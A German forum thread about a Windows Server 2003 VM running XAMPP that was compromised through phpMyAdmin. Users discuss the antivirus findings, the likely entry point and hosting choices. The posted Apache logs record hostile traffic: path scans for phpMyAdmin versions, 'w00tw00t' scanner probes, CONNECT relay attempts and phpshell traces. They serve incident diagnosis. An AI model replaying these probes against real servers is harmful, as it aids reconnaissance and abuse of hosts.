Windows VMServer gleich mal gehaked :D

P

pillul

Registered User
Ohja ich finds ja echt klasse kurz Grundkonzept:

Suse 9.3 Host System aktueller Kernel und Patches

Windows Server 2003 Gast System mit allen Patches über Bridging und eigene IP angebunden. Hinter einer Routing und Ras firewall die alle Ports ausser die benötigen schließt.

Aufgesetzt hab ich den eimer vor 2 Tagen, heute schlägt der Antivirus Alarm.

Was ich bis jetzt festgestellt habe --> Injektion über phpmyadmin.
(war die aktuell Version die bei xampp dabei ist).
Darüber dann die sam.txt oder wie sie heißt gezogen. Die weiter schritte sind mir nicht ganz klar aber was ich noch gefunden habe :

Neuer BEnutzer der nicht mir gehört.
Ein Ftp Proggi das auch nicht mir gehört
Logs von Windows --> Müll (ich will meine messages :p )

Sodala was meint ihr Mülle gleich neu aufsetzen ? Wenn ja ohne phpmyadmin ^^

Oder gibts noch Möglichkeiten den Pösewicht auszusperren.

Die ganz Erfahrung zeigt mal wieder Windows als Server --> ******e ^^

mfg

Andreas

PS hier der Virusbefund:

C:\Programme\xampp\phpMyAdmin\b.vbs: Exploit.ADODB.Stream.Gen FOUND
C:\Programme\xampp\phpMyAdmin\winback.exe: Trojan.Servu.1 FOUND
C:\RECYCLER\h.exe: Virtool.HideRun.B FOUND
C:\WINDOWS\system32\winback.exe: Trojan.Servu.1 FOUND
 
Last edited by a moderator:
Hallo

C:\Programme\xampp\phpMyAdmin\b.vbs: Exploit.ADODB.Stream.Gen FOUND
C:\Programme\xampp\phpMyAdmin\winback.exe: Trojan.Servu.1 FOUND
C:\RECYCLER\h.exe: Virtool.HideRun.B FOUND
C:\WINDOWS\system32\winback.exe: Trojan.Servu.1 FOUND
Click to expand...
Weder auf meinem W2K-Server noch auf meinem Win2003-Enterprise kann ich eine Datei Namens "winback.exe" finden! Auch kommen mir Dateien wie h.exe im Mülleimer und Scripte wie b.vbs sehr seltsam vor. Vielleicht ist nicht nur Windows allein schuld für deine Probleme.

Ich verwende aber auf beiden Servern den IIS mit Access-DB und ASP(VB) als Scriptsprache. Wenn ich nen lamp oder xampp brauchen würde, dann würde ich das unter Linux betreiben.

Gruß

mic
 
1. XAMPP ist NICHT für den produktiven Einsatz geeignet.

2. phpmyadmin ist ein unnötiges Risiko. Verwaltung über z.B. Webmin geht genauso.

3. Wozu XAMPP auf Windows? Wenn du einen Apachen willst, bekommst Du ihn auf Linux besser und günstiger.

4. Wenn man sich für Win entschieden hat, dann meist weil man meint, es zu brauchen (.NET, asp, etc.). Nicht weil man sich "besser damit auskennt".

5. Wenn Du schon ein Suse Grundsystem hast, warum zum Geier betreibst Du den Apachen dann nicht DARUNTER!?!?!??! :confused: :rolleyes: Virtualisierung schluckt hier unnötig Leistung. Und für LAMPP Server wäre wie gesagt Linux eh die bessere Wahl.

Thunda
 
Grüzi ihr zwei.

@ mic

der Virenreport ist deffinitiv richtig das sind Programme Trojaner. Über TCPview konnte man schön sehen, das die FTP Verbindungen aufbauen.

@ Thunder Richtig ASP und Dot.net heißen die Zauberwörter ;)

Ich ging bis gestern davon aus das der ISS im Vgl. zum Apache die größere Angriffsfläche liefert.

Wieso ich Apache installiert habe kann ich dir nicht sagen --> Macht der Gewohnheit....


Und das Webmin sichere ist als PhPmyAdmin will ich nicht so recht glauben ;)
 
Wie auch immer, ich bezweifle, dass ASP und .Net aufm Apachen unter Deinem XAMPP überhaupt laufen (ausser mit Workarounds die dann aber auch unter Linux möglich sind (Mono)). Insofern nix wie runter damit. Der IIS mag vielgescholten sein, wenn man ihn halbwegs gut administriert, macht er das gleiche wie der Apache und bietet für o.g. sicher die bessere Unterstützung.

Alles andere machste halt aufm Linuxserver. Ich versteh nur nicht, warum Du Dir dann keinen Windowsserver geholt hast. Es gibt genug Anbieter bei denen ein Windows Server nicht mehr kostet als ein Linux Server.

Thunda

P.S: Ein WINDOWSTrojaner könnte Dir auf einem LINUXRechner relativ egal sein! Wobei die Lücke in phpmyadmin so oder so geschlossen gehört.
 
Hallo

@pillul:

der Virenreport ist definitiv richtig, das sind Programme Trojaner
Click to expand...
Das glaube ich schon, aber ich bezweifle, dass die sich über PHPmyAdmin "reingeschlichen" haben.

Ich vermute, du hast auf dem Win-Server noch andere Dinge (surfen, spielen, installieren...) gemacht die mit xampp/PHPmyAdmin nicht zu tun haben und hast dadurch den Server infiziert. Schau doch mal, wo die winback.exe, h.exe und b.vbs herkommen. Vor allem die h.exe macht mich stutzig, hast du die selbst gelöscht? Wenn ja, warum nicht entgültig. Zu welchem Progammpaket gehörte sie?
Über TCPview konnte man schön sehen, das die FTP Verbindungen aufbauen
Click to expand...
Das war wohl schon die zweite Stufe des Angriffs: "Nach Hause telefonieren"

Gruß

mic
 
Nein er kam direkt über den phpmyadmin, darin lagen bestimmte .vb und batch scripte und auch die access log sagt dass... es lag deffinitv am Phpmyadmin.

Und ich spiele nie auf meinen Servern und surfen schon gleich garnicht ;)

Zum Thema ISS,

es war geplannt auf diesen umzuswitchen sobald die ersten asp anwendung fertig sind. Aber erläutere doch mal was bei dir "gut administriert" heißt im Bezug auf ISS.

Ich will doch keinen Windows Server ich halte von Windows Servern nichts sobald die Dinger wirklich im Internet stehen und nicht hinter einer Hardware Firewall oder ähnnlichem. Ich wollte einen Linux Server (den habe ich nun schon 2 Jahre und da wurde zwar ma versucht rein zu kommen aber ist nie was gewesen).
Und auf dem Laufen ca 40 - 50 Seiten und das auch sehr gut (sowie diverse andere Dienste)

Es ist nicht so das ich die Unschuld vom lande bin und ich sehe das ganze auch ganz locker ist eh nur eine VM Maschine und wie oben geschrieben ganz frisch. Entdeckt habe ich das ganze auch relativ früh.
Und gelernt habe ich auch wieder was bei :)
 
pillul said:
Es ist nicht so das ich die Unschuld vom lande bin und ich sehe das ganze auch ganz locker ist eh nur eine VM Maschine und wie oben geschrieben ganz frisch. Entdeckt habe ich das ganze auch relativ früh.
Und gelernt habe ich auch wieder was bei :)
Click to expand...

Ich würds nicht so locker sehen, Server gehackt ist Server gehackt. Der Vserver hat doch die gleichen Netzwerkressourcen wie der Realserver. Wo ist also der Unterschied im Schadenspotential?

Net und ASP unter Linux:


...dann brauchst Du keinen Windowsserver mehr. Hast Du überhaupt eine Lizenz dafür^^?

Thunda
 
ja habe ich werd dir den Key jetzt aber nicht niederschreiben ;).

Okay super danke das werd ich mir mal ansehen. Wenn du mir jetzt nocht dot net und den MS SQL Server zum laufen bringst ist alles in Butter *g*
(Frag mich jetzt nicht wozu die das haben wollen ...)

Nein der Server hat eine eigene IP und ist über Bridging angebunden ist vom Host System (eben weil ich Windows vServern nicht traue) komplett autark.

Ich hab den Host auch überprüft da ist alles in Butter.
 
ich sehe das ganze auch ganz locker
Click to expand...
Na ich weis nicht, wenn du das xampp-Packet nicht selbst infiziert hast, würde das ja bedeuten, es wurde von xampp mitgeliefert. Dann würde ich mich aber mal bei denen melden. Das es direkt von außen kam kann ich fast nicht glauben, wenn der Server nur 2 Tage online war. Das wäre ja echt ne Nadel im Heuhaufen.
 
Nein es war nich im Paket sonst wäre es beim ersten Scan Turnus schon aufgefallen und ich hab ja auch gesehen wann der phpmyadmin augerufen wurde (Im apache acess log)

Es wurde eingeschleußt. Mit der Nadel nun gut einige Leute wissen woll IP Ranges von Server anbietern. Wie erklären sich sonst die schon fast "normalen" SSH Attacken auf haufenweise Rootserver ?
 
pillul said:
Ich hab den Host auch überprüft da ist alles in Butter.
Click to expand...

Du hast mich nicht verstanden. Wenn Du einen Vserver hast, hast Du nun 2 (!) Server. Und die sollten sicherheitstechnisch so behandelt werden als wärens zwei selbständige Server. Denn der Windows Server kann doch auch die 100 Mbit voll auslasten, oder nicht???

Stell ihnen doch einen eigenen Windowsserver hin, bleib bei Windowsprogs und gut is. Dein System würde ich da gar nicht mit reinziehen.

Thunda
 
pillul said:
Nein er kam direkt über den phpmyadmin, darin lagen bestimmte .vb und batch scripte und auch die access log sagt dass... es lag deffinitv am Phpmyadmin.
Click to expand...

Könntest du dazu mal bitte die logs zeigen? Würde mich schon interessieren. Danke.
 
access.log
Code: 
89.48.84.33 - - [13/Nov/2006:21:04:20 +0100] "GET /sysinfo/templates/classic/images/bar_right.gif HTTP/1.1" 200 61
195.62.10.38 - - [13/Nov/2006:21:34:37 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:37 +0100] "GET /PMA/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:37 +0100] "GET /mysql/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:37 +0100] "GET /admin/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:37 +0100] "GET /db/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:37 +0100] "GET /dbadmin/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:37 +0100] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /admin/pma/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /admin/mysql/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /phpmyadmin2/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /mysqladmin/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /mysql-admin/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:38 +0100] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:39 +0100] "GET /myadmin/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:39 +0100] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:39 +0100] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:39 +0100] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:39 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:39 +0100] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 404 1122
195.62.10.38 - - [13/Nov/2006:21:34:39 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 404 1122
80.237.211.91 - - [13/Nov/2006:22:45:50 +0100] "CONNECT 80.237.255.239:443 HTTP/1.0" 405 1047
81.209.165.125 - - [13/Nov/2006:23:10:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 364
81.209.165.125 - - [13/Nov/2006:23:10:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 364
81.209.165.125 - - [13/Nov/2006:23:10:21 +0100] "GET /" 400 1045 "-" "-"
81.209.165.125 - - [13/Nov/2006:23:10:22 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 364
81.209.165.125 - - [13/Nov/2006:23:10:21 +0100] "GET /" 400 1045 "-" "-"
81.209.165.125 - - [13/Nov/2006:23:10:21 +0100] "GET /" 400 1045 "-" "-"
81.209.165.125 - - [13/Nov/2006:23:10:22 +0100] "GET /" 400 1045 "-" "-"
81.209.165.125 - - [13/Nov/2006:23:10:51 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 364
66.235.201.252 - - [14/Nov/2006:00:14:00 +0100] "GET /phpmyadmin/index.php HTTP/1.0" 404 1118
85.25.253.236 - - [14/Nov/2006:01:12:59 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 364
85.25.253.236 - - [14/Nov/2006:01:12:59 +0100] "GET /" 400 1045 "-" "-"
212.241.200.81 - - [14/Nov/2006:03:05:20 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 364
213.23.91.40 - - [14/Nov/2006:05:41:17 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 364
213.23.91.40 - - [14/Nov/2006:05:41:18 +0100] "GET /" 400 1045 "-" "-"
213.23.91.40 - - [14/Nov/2006:05:42:34 +0100] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 1044
217.160.129.201 - - [14/Nov/2006:07:00:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 364
217.160.129.201 - - [14/Nov/2006:07:00:22 +0100] "GET /" 400 1045 "-" "-"

Code: 
[Mon Nov 13 17:07:52 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:07:52 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:07:52 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:07:52 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/htdocs/favicon.ico
[Mon Nov 13 17:07:54 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:07:54 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:07:55 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:00 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:00 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:01 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:03 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:03 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:03 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:05 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:06 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:06 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:14 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:14 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:14 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:19 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:19 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:19 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:23 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:23 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:23 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:25 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:25 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:25 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:28 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:28 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:28 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:47 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/phpshell.css, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:47 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/vcss.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 17:08:47 2006] [error] [client 80.243.183.138] File does not exist: C:/Programme/xampp/phpMyAdmin/valid-xhtml10.png, referer: http://85.25.253.236/phpmyadmin/tbl_export.php
[Mon Nov 13 19:49:40 2006] [error] [client 80.237.175.205] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Mon Nov 13 20:28:14 2006] [error] [client 212.241.200.81] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Mon Nov 13 20:37:21 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/PMA
[Mon Nov 13 20:37:22 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/mysql
[Mon Nov 13 20:37:22 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/admin
[Mon Nov 13 20:37:22 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/db
[Mon Nov 13 20:37:22 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/dbadmin
[Mon Nov 13 20:37:22 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/web
[Mon Nov 13 20:37:22 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/admin
[Mon Nov 13 20:37:23 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/admin
[Mon Nov 13 20:37:23 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/admin
[Mon Nov 13 20:37:23 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/mysql-admin
[Mon Nov 13 20:37:23 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/phpmyadmin2
[Mon Nov 13 20:37:23 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/mysqladmin
[Mon Nov 13 20:37:23 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/mysql-admin
[Mon Nov 13 20:37:23 2006] [error] [client 88.153.216.98] script 'C:/Programme/xampp/htdocs/main.php' not found or unable to stat
[Mon Nov 13 20:37:23 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.5.6
[Mon Nov 13 20:37:24 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.5.4
[Mon Nov 13 20:37:24 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.5.1
[Mon Nov 13 20:37:24 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.2.3
[Mon Nov 13 20:37:24 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.2.6
[Mon Nov 13 20:37:24 2006] [error] [client 88.153.216.98] File does not exist: C:/Programme/xampp/htdocs/myadmin
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Der angeforderte Dienst wurde bereits gestartet.

Sie erhalten weitere Hilfe, wenn Sie NET HELPMSG 2182 eingeben.

Systemfehler 1060 aufgetreten.

Der angegebene Dienst ist kein installierter Dienst.

Das System kann den angegebenen Pfad nicht finden.
Ein Unterverzeichnis oder eine Datei mit dem Namen "str0" existiert bereits.
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Das System kann den angegebenen Pfad nicht finden.
Der angeforderte Dienst wurde bereits gestartet.

Sie erhalten weitere Hilfe, wenn Sie NET HELPMSG 2182 eingeben.

Systemfehler 1060 aufgetreten.

Der angegebene Dienst ist kein installierter Dienst.

Ein Unterverzeichnis oder eine Datei mit dem Namen "str0" existiert bereits.
Das System kann den angegebenen Pfad nicht finden.
Ein Unterverzeichnis oder eine Datei mit dem Namen "str0" existiert bereits.
Systemfehler 1376 aufgetreten.

Die angegebene lokale Gruppe ist nicht vorhanden.

[Mon Nov 13 21:34:37 2006] [error] [client 195.62.10.38] script 'C:/Programme/xampp/phpMyAdmin/main.php' not found or unable to stat
[Mon Nov 13 21:34:37 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/PMA
[Mon Nov 13 21:34:37 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/mysql
[Mon Nov 13 21:34:37 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/admin
[Mon Nov 13 21:34:37 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/db
[Mon Nov 13 21:34:37 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/dbadmin
[Mon Nov 13 21:34:37 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/web
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/admin
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/admin
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/admin
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpmyadmin2
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/mysqladmin
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/mysql-admin
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] script 'C:/Programme/xampp/htdocs/main.php' not found or unable to stat
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.5.6
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.5.4
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.5.1
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.2.3
[Mon Nov 13 21:34:38 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.2.6
[Mon Nov 13 21:34:39 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/myadmin
[Mon Nov 13 21:34:39 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.6.0
[Mon Nov 13 21:34:39 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.6.0-pl1
[Mon Nov 13 21:34:39 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.6.3-pl1
[Mon Nov 13 21:34:39 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.6.3
[Mon Nov 13 21:34:39 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.6.3-rc1
[Mon Nov 13 21:34:39 2006] [error] [client 195.62.10.38] File does not exist: C:/Programme/xampp/htdocs/phpMyAdmin-2.6.2-rc1
[Mon Nov 13 23:10:21 2006] [error] [client 81.209.165.125] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Mon Nov 13 23:10:21 2006] [error] [client 81.209.165.125] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Mon Nov 13 23:10:22 2006] [error] [client 81.209.165.125] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Mon Nov 13 23:10:51 2006] [error] [client 81.209.165.125] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Tue Nov 14 00:14:00 2006] [error] [client 66.235.201.252] script 'C:/Programme/xampp/phpMyAdmin/index.php' not found or unable to stat
[Tue Nov 14 01:12:59 2006] [error] [client 85.25.253.236] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Tue Nov 14 03:05:20 2006] [error] [client 212.241.200.81] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Tue Nov 14 05:41:17 2006] [error] [client 213.23.91.40] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Tue Nov 14 07:00:21 2006] [error] [client 217.160.129.201] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Tue Nov 14 09:01:38 2006] [error] [client 84.166.100.107] File does not exist: C:/Programme/xampp/htdocs/favicon.ico
[Tue Nov 14 09:01:51 2006] [error] [client 84.166.100.107] Directory index forbidden by Options directive: C:/Programme/xampp/phpMyAdmin/, referer: http://85.25.253.236/
[Tue Nov 14 09:18:06 2006] [error] [client 84.166.101.22] Directory index forbidden by Options directive: C:/Programme/xampp/phpMyAdmin/, referer: http://85.25.253.236/

error.log

+ der fakt das die bösen scripts von dennen alles aus ging im phpmyadmin ordern lagen :D

@ Thunder okay jetzt sind wir zusammen, das ist eine reine kosten Frage wenn ich die Ressourcen frei habe werde ich keinen Zweiten Server anmieten, v.a wenn die Windows Lizenz vorhanden ist.

Auch sehr lustig:

